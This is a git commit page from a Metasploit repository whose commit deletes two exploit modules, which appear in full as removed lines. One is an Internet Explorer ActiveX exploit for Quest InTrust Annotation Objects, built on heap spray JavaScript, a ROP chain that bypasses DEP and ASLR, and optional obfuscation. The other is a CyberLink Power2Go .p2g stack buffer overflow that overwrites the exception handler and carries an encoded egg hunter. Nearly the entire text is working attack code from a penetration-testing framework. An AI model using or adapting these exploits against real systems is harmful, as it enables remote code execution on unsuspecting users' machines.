Browse Source

These modules shouldn't be here, sorry

sinn3r 7 years ago
parent
commit
4be0361f69

+ 0
- 266
modules/exploits/windows/browser/annotation_objects_uninitialized_pointer_rce.rb View File

@@ -1,266 +0,0 @@
1
-##
2
-# $Id$
3
-##
4
-
5
-###
6
-# This file is part of the Metasploit Framework and may be subject to
7
-# redistribution and commercial restrictions. Please see the Metasploit
8
-# Framework web site for more information on licensing and terms of use.
9
-# http://metasploit.com/framework/
10
-##
11
-
12
-require 'msf/core'
13
-
14
-class Metasploit3 < Msf::Exploit::Remote
15
-	Rank = GreatRanking
16
-
17
-	include Msf::Exploit::Remote::HttpServer::HTML
18
-
19
-	def initialize(info = {})
20
-		super( update_info(info,
21
-			'Name'           => 'Quest InTrust Annotation Objects uninitialized pointer remote code execution',
22
-			'Description'    => %q{
23
-					This module exploits a uninitialized variable vulnerability in the 
24
-				Annotation Objects ActiveX component. The activeX component loads into memory without
25
-				opting into ALSR so this module exploits the vulnerability against windows Vista and 
26
-				Windows 7 targets. A large heap spray is required to fulfil the requirement that EAX 
27
-				points to part of the rop chain in a heap chunk and the calculated call will hit the 
28
-				pivot in a seperate heap chunk. This will take some time in the users browser.
29
-			},
30
-			'License'        => MSF_LICENSE,
31
-			'Author'         =>
32
-				[
33
-					'rgod <rgod[at]autistici.org>',	# initial discovery & poc
34
-					'mr_me <steventhomasseeley[at]gmail.com>',	# msf module
35
-				],
36
-			'Version'        => '$Revision$',
37
-			'References'     =>
38
-				[
39
-					[ 'OSVDB', '80662'],
40
-					[ 'BID', '52765'],
41
-					[ 'URL', 'http://www.exploit-db.com/exploits/18674/'],
42
-				],
43
-			'DefaultOptions' =>
44
-				{
45
-					'EXITFUNC' => 'process',
46
-					'InitialAutoRunScript' => 'migrate -f',
47
-				},
48
-			'Payload'        =>
49
-				{
50
-					'Space'    => 1024,
51
-					'BadChars' => "\x00",
52
-				},
53
-			'Platform'       => 'win',
54
-			'Targets'        =>
55
-				[
56
-					# call dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4]
57
-					# calculation: <targetaddress> - 0x44024a50 / 4 = Ret
58
-					[ 'Automatic', {} ],
59
-
60
-					# Windows XP/Vista/IE6/IE7 target
61
-					[
62
-						'Windows XP/Vista SP0-SP3 (IE6/IE7)',
63
-						{
64
-							'Ret' => 0x76767676,
65
-						}
66
-					],
67
-
68
-					# Windows XP/IE8 target - ASLR/DEP Bypass
69
-					[
70
-						'Windows XP SP0-SP3 DEP bypass (IE8)',
71
-						{
72
-							'Ret' => 0x31AAAD78,
73
-						}
74
-					],
75
-
76
-					# Windows 7/Vista/IE8 target - ASLR/DEP Bypass
77
-					[
78
-						'Windows 7/Vista ALSR/DEP bypass (IE8)',
79
-						{
80
-							'Ret' => 0x31AAAD78,
81
-						}
82
-					]
83
-				],
84
-			'DisclosureDate' => 'Mar 28 2012',
85
-			'DefaultTarget'  => 0))
86
-
87
-		register_options(
88
-			[
89
-				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true])
90
-			], self.class)
91
-	end
92
-
93
-	def junk
94
-		return rand_text_alpha(4).unpack("L")[0].to_i
95
-	end
96
-
97
-	def on_request_uri(cli, request)
98
-		#Set target manually or automatically
99
-		my_target = target
100
-		if my_target.name == 'Automatic'
101
-			agent = request.headers['User-Agent']
102
-			if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/	# xp/ie6
103
-				my_target = targets[1]
104
-			elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/	# xp/ie7
105
-				my_target = targets[1]
106
-			elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/	# vista/ie7
107
-				my_target = targets[1]
108
-			elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/	# xp/ie8
109
-				my_target = targets[2]
110
-			elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8\.0/	# vista/ie8
111
-				my_target = targets[2]
112
-			elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/	# win7/ie8
113
-				my_target = targets[3]
114
-			end
115
-		end
116
-
117
-		print_status("Target selected: #{my_target.name}") if datastore['VERBOSE']
118
-
119
-		# Re-generate the payload.
120
-		return if ((p = regenerate_payload(cli)) == nil)
121
-
122
-		# shellcode
123
-		sc = Rex::Text.to_unescape(p.encoded)
124
-
125
-		# Randomize object name
126
-		obj_name  = rand_text_alpha(rand(100) + 1)
127
-		main_sym  = 'main' #main function name
128
-
129
-		if my_target.name =~ /IE6/ or my_target.name =~ /IE7/
130
-
131
-			js = <<-EOS
132
-			function heapspray(){
133
-				shellcode = unescape('#{sc}');
134
-				bigblock = unescape("%u0c0c%u0c0c");
135
-				headersize = 20;
136
-				slackspace = headersize+shellcode.length;
137
-				while (bigblock.length<slackspace){ bigblock+=bigblock; }
138
-				fillblock = bigblock.substring(0, slackspace);
139
-				block = bigblock.substring(0, bigblock.length-slackspace);
140
-				while(block.length+slackspace<0x40000){ block = block+block+fillblock; }
141
-				memory = new Array();
142
-				for (i=0;i<1000;i++){ memory[i] = block+shellcode; }
143
-			}
144
-			function main(){
145
-				heapspray();
146
-  				#{obj_name}.Add(#{my_target.ret},1);
147
-			}			
148
-			EOS
149
-
150
-		end
151
-
152
-		if my_target.name =~ /IE8/
153
-
154
-			# all rop gadgets are taken from AnnotateX.dll - v1.0.32.0 (non alsr/non rebase)
155
-			rop_gadgets = [
156
-				junk,
157
-				junk,
158
-				junk,
159
-				0x44014075				# xchg eax,esp ; add [ecx],10 ; retn 8 (pivot)
160
-			].pack('V*') 
161
-
162
-			rop_gadgets << [0x44015CEF].pack('V*') * 140	# padding of retn's
163
-
164
-			rop_gadgets << [
165
-				0x44015CEF,				# retn
166
-				0x44015CEF,				# retn
167
-				0x44015CEF,				# retn
168
-				0x44015cee,				# pop edx ; retn
169
-				0x4401a130,				# ptr to &VirtualAlloc() (IAT)
170
-				0x44015ca4,				# mov eax,[edx+4] ; retn
171
-				0x44001218,				# push eax ; dec eax ; pop esi ; pop ebp ; retn 14
172
-				junk,				# filler (compensate)
173
-				0x440159bb,				# pop ebp ; retn
174
-				junk,				# filler (retn offset compensation)
175
-				junk,				# filler (retn offset compensation)
176
-				junk,				# filler (retn offset compensation)
177
-				junk,				# filler (retn offset compensation)
178
-				0x4400238A,				# filler (pop edi ; pop esi ; pop ebp ; retn)
179
-				0x440012c1,				# push esp ; ret 08
180
-				0x44016264,				# pop ebx ; retn
181
-				0x00004000,				# 0x00000001-> ebx
182
-				0x44015cc9,				# pop edx ; retn
183
-				0x00001000,				# 0x00001000-> edx
184
-				0x44017664,				# pop ecx ; retn
185
-				0x00000040,				# 0x00000040-> ecx
186
-				0x44017bd8,				# pop edi ; retn
187
-				0x44017ebe,				# retn
188
-				0x4400bf25,				# pop eax ; retn
189
-				0x0C0C2478,				# pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn
190
-				0x44005C57,				# pushad ; push 8 ; push ecx; push esi; call [eax+c]
191
-				0x90909090,				# nops, do not change as it changes the offset
192
-				0x90909090,
193
-				0x90909090,
194
-				0x90909090,
195
-				0x90909090,
196
-				0x90909090,
197
-				0x90909090,
198
-				0x90909090,
199
-				0x90909090,
200
-				0x90909090,
201
-				0x90909090,
202
-				0x90909090
203
-			].pack('V*')
204
-
205
-			rop = Rex::Text.to_unescape(rop_gadgets)
206
-
207
-			js = <<-EOF
208
-			function heapspray(){
209
-				var payload = unescape('#{rop}');
210
-				payload += unescape('#{sc}');
211
-				var data = payload;
212
-				while(data.length < 100000) { data += data; }
213
-				var onemeg = data.substr(0, 64*1024/2);
214
-    				for (i=0; i<14; i++) {
215
-        				onemeg += data.substr(0, 64*1024/2);
216
-    				}	
217
-				onemeg += data.substr(0, (64*1024/2)-(38/2));
218
-				var block = new Array();
219
-    				for (i=0; i<700; i++) {
220
-        				block[i] = onemeg.substr(0, onemeg.length);
221
-    				}
222
-			}
223
-			function main(){
224
-				heapspray();
225
-				#{obj_name}.Add(#{my_target.ret},1);
226
-			}
227
-			EOF
228
-
229
-			#JS obfuscation on demand only for IE8
230
-			if datastore['OBFUSCATE']
231
-				js = ::Rex::Exploitation::JSObfu.new(js)
232
-				js.obfuscate
233
-				main_sym = js.sym('main')
234
-			end
235
-
236
-		end
237
-
238
-		content = <<-EOF
239
-		<object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='#{obj_name}' ></object>
240
-		<script language='JavaScript' defer>
241
-		#{js}
242
-		</script>
243
-		<body onload="#{main_sym}();">
244
-		<body>
245
-		</html>
246
-		EOF
247
-
248
-		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
249
-
250
-		#Remove the extra tabs from content
251
-		content = content.gsub(/^\t\t/, '')
252
-
253
-		# Transmit the response to the client
254
-		send_response_html(cli, content)
255
-
256
-		# Handle the payload
257
-		handler(cli)
258
-	end
259
-end
260
-=begin
261
-eax=76767676 ebx=4401e51c ecx=01f85340 edx=00000000 esi=01f85340 edi=00000001
262
-eip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0         nv up ei pl nz na po nc
263
-cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
264
-ANNOTA_1+0xae62:
265
-4400ae62 ff1485504a0244  call    dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4] ds:0023:1ddc2428=????????
266
-=end

+ 0
- 118
modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb View File

@@ -1,118 +0,0 @@
1
-##
2
-# $Id$
3
-##
4
-
5
-##
6
-# This file is part of the Metasploit Framework and may be subject to
7
-# redistribution and commercial restrictions. Please see the Metasploit
8
-# web site for more information on licensing and terms of use.
9
-# http://metasploit.com/
10
-##
11
-
12
-require 'msf/core'
13
-
14
-class Metasploit3 < Msf::Exploit::Remote
15
-	Rank = GreatRanking
16
-
17
-	include Msf::Exploit::FILEFORMAT
18
-
19
-	def initialize(info = {})
20
-		super(update_info(info,
21
-			'Name'		=> 'CyberLink Power2Go name attribute (.p2g) Stack Buffer Overflow Exploit',
22
-			'Description' 	=> %q{
23
-					This module exploits a stack buffer overflow in CyberLink Power2Go version 8.x
24
-				The vulnerability is triggered when opening a malformed p2g file containing an overly
25
-				long string in the 'name' attribute of the file element. This results in overwriting a
26
-				structured exception handler record.
27
-			},
28
-			'License'	=> MSF_LICENSE,
29
-			'Version'	=> "$Revision$",
30
-			'Author'	=>
31
-				[
32
-					'modpr0be <modpr0be[at]spentera.com>',    # initial discovery
33
-					'mr_me <steventhomasseeley[at]gmail.com>' # msf module
34
-				],
35
-			'References'     =>
36
-				[
37
-					['BID', '50997'],
38
-					['OSVDB', '70600'],
39
-					['URL', 'http://www.exploit-db.com/exploits/18220/'],
40
-					['URL', 'http://www.kb.cert.org/vuls/id/158003']
41
-				],
42
-			'DefaultOptions' =>
43
-				{
44
-					'EXITFUNC' => 'process',
45
-					'InitialAutoRunScript' => 'migrate -f',
46
-				},
47
-			'Payload'	=>
48
-				{
49
-					'Space'    => 1024,
50
-					'BadChars' => "\x00",
51
-				},
52
-			'Platform'	=> 'win',
53
-			'Targets'	=>
54
-				[
55
-					# Power2Go8.exe (0x004b0028) - pop esi/pop ebp/pop ebx/add esp,10/retn
56
-					[ 'CyberLink Power2Go 8 (XP/Vista/win7) Universal', { 'Ret' => "\x28\x4b" } ]
57
-				],
58
-			'DisclosureDate' => 'Sep 12 2011',
59
-			'DefaultTarget'	=> 0))
60
-
61
-		register_options(
62
-			[
63
-				OptString.new('FILENAME', [ false, 'The output filename.', 'msf.p2g'])
64
-			], self.class)
65
-	end
66
-
67
-	def get_payload(hunter)
68
-		
69
-		[ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|
70
-			enc = framework.encoders.create(name)
71
-			if name =~ /unicode/
72
-				enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
73
-			else
74
-				enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })
75
-			end
76
-			# NOTE: we already eliminated badchars
77
-			hunter = enc.encode(hunter, nil, nil, platform)
78
-			if name =~/alpha/
79
-				#insert getpc_stub & align EDX, unicode encoder friendly.
80
-				#Hardcoded stub is not an issue here because it gets encoded anyway
81
-				getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"
82
-				hunter = getpc_stub + hunter
83
-			end
84
-		}
85
-
86
-		return hunter
87
-	end
88
-
89
-	def exploit
90
-
91
-		title = rand_text_alpha(10)
92
-		buffer = ""
93
-		buffer << "\x41" * 778
94
-		buffer << "\x58\x28"		# nseh
95
-		buffer << target['Ret']		# seh
96
-		buffer << "\x5f\x73" * 15		# pop edi/add [ebx],dh (after byte alignment)
97
-		buffer << "\x58\x73"		# pop eax/add [ebx],dh (after byte alignment)
98
-		buffer << "\x40\x73" * 3		# inc eax/add [ebx],dh (after byte alignment)
99
-		buffer << "\x40"		# inc eax
100
-		buffer << "\x73\x42" * 337		# add [ebx],dh/pop edx (after byte alignment)
101
-		buffer << "\x73"		# add [ebx],dh (after byte alignment)
102
-		buffer << get_payload(payload.encoded)
103
-
104
-		p2g_data = <<-EOS
105
-		<Project magic="#{title}" version="101">
106
-		<Information />
107
-			<Compilation>
108
-				<DataDisc>
109
-					<File name="#{buffer}" />
110
-				</DataDisc>
111
-			</Compilation>
112
-		</Project>
113
-		EOS
114
-
115
-		print_status("Creating '#{datastore['FILENAME']}' file ...")
116
-		file_create(p2g_data)
117
-	end
118
-end

Loading…
Cancel
Save